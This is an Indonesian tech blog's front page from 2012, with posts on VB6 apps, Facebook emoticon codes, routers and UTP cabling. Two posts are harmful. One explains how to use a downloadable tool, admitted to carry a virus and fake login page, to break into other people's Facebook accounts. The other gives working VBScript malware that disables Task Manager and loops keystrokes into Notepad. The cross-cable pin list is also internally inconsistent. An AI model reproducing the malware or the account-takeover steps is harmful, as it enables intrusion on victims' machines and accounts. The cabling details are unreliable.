Minggu, 04 November 2012

2 Aplikasi Penginputan Data Mahasiswa

apa kabar para debugger indonesia..???
update lagi ini masih tentang Visual Basic 6.0 kali ini menggunakan database SQL SERVER 2000,,
program yang saya buat ini mengenai Penginputan Data Mahasiswa....
yang didalamnya hanya terdapat 3 form yaitu
-form mahasiswa
-form matakuliah
-form frs.
memang program ini sangat sederhana sih.. tapi mudah-mudahan bisa bermanfaat buat para debugger yang lagi belajar pemograman VB 6.0...
di bawah ini adalah screenshot menu utama..





gimana para debugger ada yg berminat...??
langsung saja download disini...


Read More...

Minggu, 21 Oktober 2012

1 My Best Friend

Read More...

Jumat, 05 Oktober 2012

3 APLIKASI VISUAL BASIC

Assalamualaikum...
Apa kabar semuanya,,,,,???
Semoga baik-baik saja ya.....!!!!
Sudah lamo ini tak updete status,,, ehhhh.... salah.....!!!! update Blog...
yah... mungkin karna banyak kesibukan jd jarang buka dah....
Thaks Ya buat kawan-kawan yg dah mau berkunjung selama gw gx pernah nongol....
eeemmmmmmm......
Buat temen-temen yang lagi kuliah atau lg belajar Visual Basic, Kali ini saya akan berbagi sebuah aplikasi yg sederhana tentang SISTEM PENGOLAH DATA RUMAH SAKIT...
Ya... cm sederhana sih tp mudah-mudahan bisa bermanfaat buat temen-temen...
Untuk lebih jelasnya silahkan lihat gambar tempilan menu utama pada aplikasi yg saya buat..
Buat temen-temen yang berminat silahkan DOWNLOAD langsung di bawah ini..
 

Read More...

Minggu, 08 Juli 2012

9 Emoticon Facebook



Sudah tau kah anda tentang chat menggunaka imoticon huruf & gambar yang unik dan lucu....???
kalo belum tau ini saya kasih triknya membuat emoticon pada chat di facebook agar tampilan chat anda menjadi lebih menarik....
di bawah ini saya kasih screenshot nya...


KODE HURUF

[[244961858909298]] = A
[[344113652270150]] = B
[[344991278847613]] = C
[[164461493653696]] = D
[[196752423751220]] = E
[[301630573215430]] = F
[[251496118250464]] = G
[[266394220086654]] = H
[[164866556948132]] = I
[[180599335371968]] = J
[[209067005843651]] = K
[[238594039545396]] = L
[[147702285338528]] = M
[[309221402452022]] = N
[[180901405340714]] = O
[[246506925416551]] = P
[[333343613344059]] = Q
[[123128367803569]] = R
[[316143388416019]] = S
[[334073456605673]] = T
[[199626093460643]] = U
[[224202614323263]] = V
[[336032459740792]] = W
[[205228226232732]] = X
[[142420399202282]] = Y
[[157919817645224]] = Z


KODE ICON

[[243344945733611]] = Repost
[[mahochat]] = Maho
[[203443053077888]] = I Love Kaskus
[[205827876172490]] = Bingung
[[261018420628968]] = Thumbs
[[328740787138287]] = Nope
[[296027833771776]] = Capede
[[311851138846391]] = Alay
[[guengakak]] = Ngakak
[[171108522930776]] = trollface
[[foreveralonecomics]] = forever alone.
[[MegustaMeMe]] = Me Gusta.
[[149333368464171]] = Yao.
[[145768898802324]] = FUUUUUU.
[[168456309878025]] = LoL.
[[FapFapFapFap.B]] = Fap Fap Fap Fap.
[[106043532814443]] = Y U NO.
[[214457085240151]] = Nothing to do here.
[[129627277060203]] = Poker Face.
[[160723207280093]] = Are you f*cking kidding me?
[[ChallengeAceptado]] = Challenge Accepted
[[252346194801306]] = RUMAH
[[266313623412267]] = PINGWIN LINUX
[[191560730921873]] = LOGO GOOGLE CHROME
[[182809565135565]] = LOGO GOOGLE ++
[[242070735843795]] = LOGO SNAPTU
[[266910496686186]] = LOGO WINDOWS
[[258958334142268]] = LOGO ANDROID
[[google]] = LOGO GOOGLE
[[rhanasaputra]] = SAYA SENDIRI
KODE ICON

[[249199828481201]] - Konata Izumi
[[250128751720149]] - Domo Kun
[[223328504409723]] - Gintoki Sakata
[[236147243124900]] - Pokeball
[[326134990738733]] - Pikachu
[[155393057897143]] - Doraemon
[[224502284290679]] - Nobita
[[144685078974802]] - Mojacko
[[334954663181745]] - Spongebob
[[196431117116365]] - Shin chan
[[148935948523684]] - Pedo Bear
[[269153023141273]] - Poring
[[yahoo]]
[[google]]
[[facebook]]
[[kaskus]]
[[amazon]]
[[youtube]]
[[googlechrome]]
[[opera]]
[[internetexplorer]]
[[flock]]
[[microsoft]]
[[microsoftword]]
[[microsoftexcel]]
[[microsoftpowerpoint]]
[[megaxus]]
[[grandchase]]
[[indovision]]
[[history]]
[[sony]]
[[nokia]]
[[telkomsel]]
[[windows]]
[[transformer]]
[[itones]]
[[photosop]]
[[142318662481784]] = Victorbook
[[131763186925449]] = Uksw
[[141996965827812]] = Indonesia
[[137748709592464]] = Indonesia Hiphop Community
[[134068549961650]] = Maluku
[[104527799601292]] = Bali
[[136001599765939]] = Jakarta
[[137951926227398]] = Salatiga
[[140145309347027]] = Topi
Read More...

Sabtu, 07 Juli 2012

4 Simple Template Magazine


Hay temen-temen.... update lagi ini,,, 
ada template terbaru,,, buatan kita anak alay..
 gimana tertarik mo cobain,,,,,??? 
gw kasih gratis..... 
gx berat kk & simple banget.. mau download,,,,???
ini tampilanya,,, keren kan,,,,,???




Read More...

Rabu, 04 Juli 2012

15 cara hack facebook dengan software

cara hack facebook dengan software

temen-temen pasti tau kan hack itu apa,,,,????
hack itu pasti identik dengan kejahatan di dunia cyber kan..
temen-temen ada yang pernah di ambil akunya oleh para crecker...???
ini saya punya software yang bisa mengambil akun anda...
ya memang tidak 100% berhasil sih tapi di coba dulu apa salahnya... ya kan...?????

Berikut ini langkah-langkah menjalankannya :

1. Download facebook hack di sini

2. Ekstrack file desktop.rar lalu jalankan 007_facebook_hack_v_10.exe

3. Tekan tombol ENTER lalu masukkan passwordnya. Password program ini ada di file bernama password.txt yang ada dalam paket file desktop.rar.

4. Jika langkah di atas benar, kita akan masuk pada halaman utama hacking. Lalu tekan tombol Setting

5. Pada kotak server box, Masukkan www.facebook.com

6. Pada isian HTTP Proxy, isi dengan alamat proxy. Gunakan alamat proxy bypass agar kita bisa melakukan hacking seolah-olah dari server luar negeri. Untuk mencarinya, masuk ke http://www.aliveproxy.com/, lalu pilih salah satu daftar Negara yang ada. Untuk mencari tahu proxy yang kita dapat masih dalam kondisi aktif, lakukan perubahan setting proxy pada browser dan arahkan browser tersebut ke http://www.cmyip.com/. Jika alamat proxy bisa tampil, itu artinya bisa di gunakan.

7. Tekan tombol Connect hingga indikator di bagian kanan kotak isian berwarna hijau.
8. Tekan Tombol Back, lalu masukkan user ID orang yang ingin kita bobol account facebooknya.

Kesuksesan dalam proses penetrasi menggunakan software ini sangatlah bergantung pada speed koneksi internet kita. Cobalah juga dengan bergant-ganti IP Proxy untuk menemukan alamat yang sesuai. Ada rekan yang mengaku sukses melakukan penetrasi dan juga yang mengaku selalu gagal.

Facebook sendiri sejauh ini telah mengupdate sistem kemanannya dengan menerapkan sistem proxy dinamis yang mampu memfilter alamat proxy yang akan masuk ke data server. Untuk itu, software facebook hack ini bekerja ibarat saling kejar-kejaran dengan sistem pengamanan facebook.

Program ini juga di sisipi virus dan halaman login facebook palsu (fake login page). Berhati-hatilah menggunakan program ini dan jangan gunakan untuk hal-hal yang merugikan orang lain. Selamat mencoba !!
Read More...

Selasa, 03 Juli 2012

7 Cara membuat virus

   Disini saya akan menjelaskan cara membuat virus dengan pudah tapi ampuh,,,,
berikut ini adalah cara-cara membuat virus :

1. Copy code vbscript dibawah ini (diantara garis pembatas)

==========================================================

Set klikbebas = CreateObject("Wscript.shell")
klikbebas.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

WScript.Sleep 18000
WScript.Sleep 1000
do
Set klikbebas = WScript.CreateObject("WScript.Shell")
klikbebas.Run "notepad"
WScript.Sleep 100
klikbebas.AppActivate "Notepad"
WScript.Sleep 500
klikbebas.SendKeys "K"
WScript.Sleep 500
klikbebas.SendKeys "u"
WScript.Sleep 500
klikbebas.SendKeys "n"
WScript.Sleep 500
klikbebas.SendKeys "j"
WScript.Sleep 500
klikbebas.SendKeys "u"
WScript.Sleep 500
klikbebas.SendKeys "n"
WScript.Sleep 500
klikbebas.SendKeys "g"
WScript.Sleep 500
klikbebas.SendKeys "i"
WScript.Sleep 500
klikbebas.SendKeys " "
WScript.Sleep 500
klikbebas.SendKeys "k"
WScript.Sleep 500
klikbebas.SendKeys "l"
WScript.Sleep 500
klikbebas.SendKeys "i"
WScript.Sleep 500
klikbebas.SendKeys "k"
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "e"
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "a"
WScript.Sleep 500
klikbebas.SendKeys "s"
WScript.Sleep 500
klikbebas.SendKeys "."
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "l"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "g"
WScript.Sleep 500
klikbebas.SendKeys "s"
WScript.Sleep 500
klikbebas.SendKeys "p"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "."
WScript.Sleep 500
klikbebas.SendKeys "c"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "m"
WScript.Sleep 500
wscript.sleep 5000
loop

==========================================================

2. Buka Notepad --> paste kan code nya di notepad --> simpan dengan extensi vbs (misal virus.vbs)

3. Mau dicoba hasil virus yang kamu buat? tinggal klik aja deh 2x, dan nikmatilah hasilnya.

cara menghentikanyapun sangat mudah dengan Task Manager Ctrl + Alt + Delete sudah tidak bisa.

Ok, ikutilah langkah-langkah mengaktifkan kembali Task Manager :

1. Copy code vbscript dibawah ini (diantara garis pembatas)

==========================================================

Set klikbebas = CreateObject("Wscript.shell")
klikbebas.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"

==========================================================

2. Buka Notepad --> paste kan code nya di notepad --> simpan dengan extensi vbs (misal ini antivirus.vbs)

3. Jalankan file vbs yang sudah dibuat tersebut, coba buka Task Manager dengan cara tekan Ctrl + Alt + Delete yang ada di keyboard tentunya.


Selesai dah cara membuat virus gadungan kelas teri. Seperti itulah virus dan antivirus dibuat, tapi ini contoh....

silahkan mencoba ya.....??????
Read More...

Kamis, 14 Juni 2012

7 Pengertian Router


ROUTER

Router adalah perangkat network yang digunakan untuk menghubungkan beberapa network, baik network yang sama maupun berbeda dari segi teknologinya seperti menghubungkan network yang menggunakan topologi Bus, Star dan Ring.  Router minimal memiliki 2 network interface.
Dalam postingan sebelumnya tentang mengenal teknik subneting telah disinggung bahwa koneksi antar network (jaringan dengan subnet IP yang berbeda) hanya bisa terjadi dengan bantuan Router.

Pengertian Router menurut Wikipedia

Router adalah sebuah alat yang mengirimkan paket data melalui sebuah jaringan atau Internet menuju tujuannya, melalui sebuah proses yang dikenal sebagai routing. Proses routing terjadi pada lapisan 3 (Lapisan jaringan seperti Internet Protocol) dari stack protokol tujuh-lapis OSI.

Router berfungsi sebagai penghubung antar dua atau lebih jaringan untuk meneruskan data dari satu jaringan ke jaringan lainnya. Router berbeda dengan switch. Switch merupakan penghubung beberapa alat untuk membentuk suatu Local Area Network (LAN).

Sebagai ilustrasi perbedaan fungsi dari router dan switch merupakan suatu jalanan, dan router merupakan penghubung antar jalan. Masing-masing rumah berada pada jalan yang memiliki alamat dalam suatu urutan tertentu. Dengan cara yang sama, switch menghubungkan berbagai macam alat, dimana masing-masing alat memiliki alamat IP sendiri pada sebuah LAN

Router sangat banyak digunakan dalam jaringan berbasis teknologi protokol TCP/IP, dan router jenis itu disebut juga dengan IP Router. Selain IP Router, ada lagi AppleTalk Router, dan masih ada beberapa jenis router lainnya. Internet merupakan contoh utama dari sebuah jaringan yang memiliki banyak router IP.

Router dapat digunakan untuk menghubungkan banyak jaringan kecil ke sebuah jaringan yang lebih besar, yang disebut dengan internetwork, atau untuk membagi sebuah jaringan besar ke dalam beberapa subnetwork  untuk meningkatkan kinerja dan juga mempermudah manajemennya. Router juga kadang digunakan untuk mengoneksikan dua buah jaringan yang menggunakan media yang berbeda (seperti halnya router wireless yang pada umumnya selain ia dapat menghubungkan komputer dengan menggunakan radio, ia juga mendukung penghubungan komputer dengan kabel UTP), atau berbeda arsitektur jaringan, seperti halnya dari Ethernet ke Token Ring.

Router juga dapat digunakan untuk menghubungkan LAN ke sebuah layanan telekomunikasi seperti halnya telekomunikasi leased line atau Digital Subscriber Line (DSL). Router yang digunakan untuk menghubungkan LAN ke sebuah koneksi leased line seperti T1, atau T3, sering disebut sebagai access server. Sementara itu, router yang digunakan untuk menghubungkan jaringan lokal ke sebuah koneksi DSL disebut juga dengan DSL router. Router-router jenis tersebut umumnya memiliki fungsi firewall untuk melakukan penapisan paket berdasarkan alamat sumber dan alamat tujuan paket tersebut, meski beberapa router tidak memilikinya. Router yang memiliki fitur penapisan paket disebut juga dengan packet-filtering router. Router umumnya memblokir lalu lintas data yang dipancarkan secara broadcast sehingga dapat mencegah adanya broadcast storm yang mampu memperlambat kinerja jaringan.


Jenis-jenis router
Secara umum, router dibagi menjadi dua buah jenis, yakni:
static router (router statis): adalah sebuah router yang memiliki tabel routing statis yang di setting secara manual oleh para administrator jaringan.
dynamic router (router dinamis): adalah sebuah router yang memiliki dan membuat tabel routing dinamis, dengan mendengarkan lalu lintas jaringan dan juga dengan saling berhubungan dengan router lainnya.


Cara Kerja Router

Fungsi utama Router adalah merutekan paket (informasi). Sebuah Router memiliki kemampuan Routing, artinya Router secara cerdas dapat mengetahui kemana rute perjalanan informasi (paket) akan dilewatkan, apakah ditujukan untuk host lain yang satu network ataukah berada di network yang berbeda.

Jika paket-paket ditujukan untuk host pada network lain maka router akan meneruskannya ke network tersebut. Sebaliknya, jika paket-paket ditujukan untuk host yang satu network maka router akan menghalangi paket-paket keluar.

Contoh Router

Cisco Router merupakan nama yang sudah tidak asing lagi, tetapi disisi lain terdapat nama yang mulai familiar, yaitu MikroTik Router. MikroTik menawarkan kemudahan konfigurasi dan kehandalan fitur dengan harga yang relatif murah. koq jadi promosi :-)



Disamping ini adalah gambar MikroTik RB750 yang merupakan Router dengan ukuran kecil dan harga yang terjangkau (sekitar 350 ribuan) yang dapat kita gunakan untuk keperluan koneksi jaringan internet dirumah, warnet atau di kantor.

Router versus Bridge
Cara kerja router mirip dengan bridge jaringan, yakni mereka dapat meneruskan paket data jaringan dan dapat juga membagi jaringan menjadi beberapa segmen atau menyatukan segmen-segmen jaringan. Akan tetapi, router berjalan pada lapisan ketiga pada model OSI(lapisan jaringan), dan menggunakan skema pengalamatan yang digunakan pada lapisan itu, seperti halnya alamat IP. Sementara itu,bridge jaringan berjalan pada lapisan kedua pada model OSI (lapisan data-link), dan menggunakan skema pengalamatan yang digunakan pada lapisan itu, yakni MAC address.
Lalu, kapan penggunaan bridge jaringan dilakukan dan kapan penggunakan router dilakukan? Bridge, sebaiknya digunakan untuk menghubungkan segmen-segmen jaringan yang menjalankan protokol jaringan yang sama (sebagai contoh: segmen jaringan berbasis IP dengan segmen jaringan IP lainnya). Selain itu, bridge juga dapat digunakan ketika di dalam jaringan terdapat protokol-protokol yang tidak bisa melakukan routing, seperti halnya NetBEUI. Sementara itu, router sebaiknya digunakan untuk menghubungkan segmen-segmen jaringan yang menjalankan protokol jaringan yang berebeda (seperti halnya untuk menghubungkan segmen jaringan IP dengan segmen jaringan IPX.) Secara umum, router lebih cerdas dibandingkan dengan bridge jaringan dan dapat meningkatkan bandwidthjaringan, mengingat router tidak meneruskan paket broadcast ke jaringan yang dituju. Dan, penggunaan router yang paling sering dilakukan adalah ketika kita hendak menghubungkan jaringan kita ke internet.

Read More...

Selasa, 12 Juni 2012

0 DAFTAR ISI





Read More...

Jumat, 25 Mei 2012

3 Cara Pemasangan Kabel UTP



Biar artikelnya ga kepanjangan. Nanti Anda malah malas membacanya. cara memasang kabel UTP tipe straight dan cross adalah sebagai berikut:
Sebelum Anda praktek, ada beberapa hardware yang perlu Anda siapkan, diantanranya:
  1. Kabel UTP (Unshielded Twisted Pair). Kabel UTP yang biasa dipakai adalah kabel UTP categori 5 (UTP Cat 5). Kenapa? Karena kabel UTP Cat-5 support transfer data hingga 100 Mbps. Kabel ini terdiri atas 8 kecil yang mempunyai warna berbeda-beda. Warna kabel tersebut adalah Orange, Orange Putih, Biru, Biru Putih, Hijau, Hijau Putih, Coklat, dan Coklat Putih.
 
      2.   Yang kedua adalah Jack RJ-45. Jack ini mirip dengan jack telepon rumah. Cuma ukurannya yang lebih besar. Jack RJ-45 terdiri dari 8 pin, sesuai dengan jumlah kabel UTP.
 
      3.   Crimping Tools atau Tang Crimping. Hardware yang satu ini mirip dengan tang. Namun, fungsinya tidak seperti tang pada umumnya. Crimping tool ini berguna untuk menjepitkan kabel pada Jack RJ-45.

Semua hardware diatas bisa Anda dapatkan di sebagian besar toko komputer. Harganya pun tidak terlalu mahal.

Kabel UTP Tipe Straight
OK. Sekarang saya kan bahas cara pemasangannya. Yang pertama adalah cara memasang kabel UTP tipe straight. Untuk itu, lakukan langkah-langkah berikut:
  1. Kupas ujung kabel sekitar 1 cm, sehingga kabel kecil-kecil yang ada didalamnya kelihatan.
  2. Pisangkan kabel-kabel tersebut dan luruskan. Kemudian susun dan rapikan berdasarkan warnanya yaitu Orange Putih, Orange, Hijau Putih, Biru, Biru Putih, Hijau, Coklat Putih, dan Coklat. Setelah itu potong bagian ujungnya sehingga rata satu sama lain.
  3. Setelah kabel tersusun, ambil Jack RJ-45. Seperti yang saya katakan tadi Jack ini terdiri dari 8 pin. Pin 1 dari jack ini adalah pin yang berada paling kiri jika posisi pin menghadap Anda. Berurut ke kanan adalah jack 2, 3, dan seterusnya.

  1. Kemudian masukkan kabel-kabel tersebut ke dalam Jack RJ-45 sesuai dengan urutan tadi yaitu sebagai berikut:
    • Orange Putih pada Pin 1
    • Orange pada Pin 2
    • Hijau Putih pada Pin 3
    • Biru pada Pin 4
    • Biru Putih pada Pin 5
    • Hijau pada Pin 6
    • Coklat Putih pada Pin 7
    • Coklat pada Pin 8.
Masukkan kabel tersebut hingga bagian ujungnya mentok di dalam jack.
  1. Masukan Jack RJ-45 yang sudah terpasang dengan kabel tadi ke dalam mulut tang crimping yang sesuai sampai bagian pin Jack RJ-45 berada didalam mulut tang. Sekarang jepit jack tadi dengan tang crimping hingga seluruh pin menancap pada kabel. Biasanya jika pin jack sudah menancap akan mengeluarkan suara “klik”.
Sekarang Anda sudah selesai memasang jack RJ-45 pada ujung kabel pertama. Untuk ujung kabel yang kedua, langkah-langkahnya sama dengan pemasangan ujung kabel pertama tadi. Untuk itu, ulangi langkah-langkah tadi untuk memasang Jack RJ-45 pada ujung kabel yang kedua.
Susunan kabel UTP tipe straight bisa Anda lihat pada gambar di bawah:






Kabel UTP Tipe Cross

Cara memasang kabel UTP tipe straight sudah saya jelaskan tadi. Sekarang saya bahas mengenai cara memasang kabel UTP tipe cross. Cara pemasangan kabel UTP tipe cross hampir sama dengan memasang kabel UTP tipe straight. Mengenai teknis pemasanganya sama seperti tadi. Perbedaanya adalah urutan warna kabel pada ujung kabel yang kedua. Untuk ujung kabel pertama, susunan kabel sama dengan susunan kabel UTP tipe straight yaitu:
  • Orange pada Pin 1
  • Orange Putih pada Pin 2
  • Hijau pada Pin 3
  • Biru pada Pin 4
  • Biru Putih pada Pin 5
  • Hijau Putih pada Pin 6
  • Coklat Putih pada Pin 7
  • Coklat pada Pin 8.
Untuk ujung kabel yang kedua, susunan warnanya berbeda dengan ujung pertama. Adapaun susunan warnanya adalah sebagi berikut:
  • Hijau Putih pada Pin 1
  • Hijau pada Pin 2
  • Orange Putih pada Pin 3
  • Biru pada Pin 4
  • Biru Putih pada Pin 5
  • Orange pada Pin 6
  • Coklat Putih pada Pin 7
  • Coklat pada Pin 8.
Susunan kabel tadi bisa Anda lihat pada gambar di bawah.





Kesimpulannya adalah jika Anda memasang kabel UTP tipe straight maka susunan warna pada kedua ujung kabel adalah sama. Sedangkan cara pemasangan UTP tipe cross, susunan warna ujung kabel pertama berbeda dengan unjung kabel kedua.
Demikian tutorial cara memasang kabel UTP tipe straight dan tipe cross. Semoga bermanfaat bagi Anda. Apabila Anda menemukan kesalahan pada artikel ini mohon dikoreksi melalui kotak komentar. Terima kasih.
 
 
Read More...

peluang usaha

Followers

Buku Tamu

Total Pageviews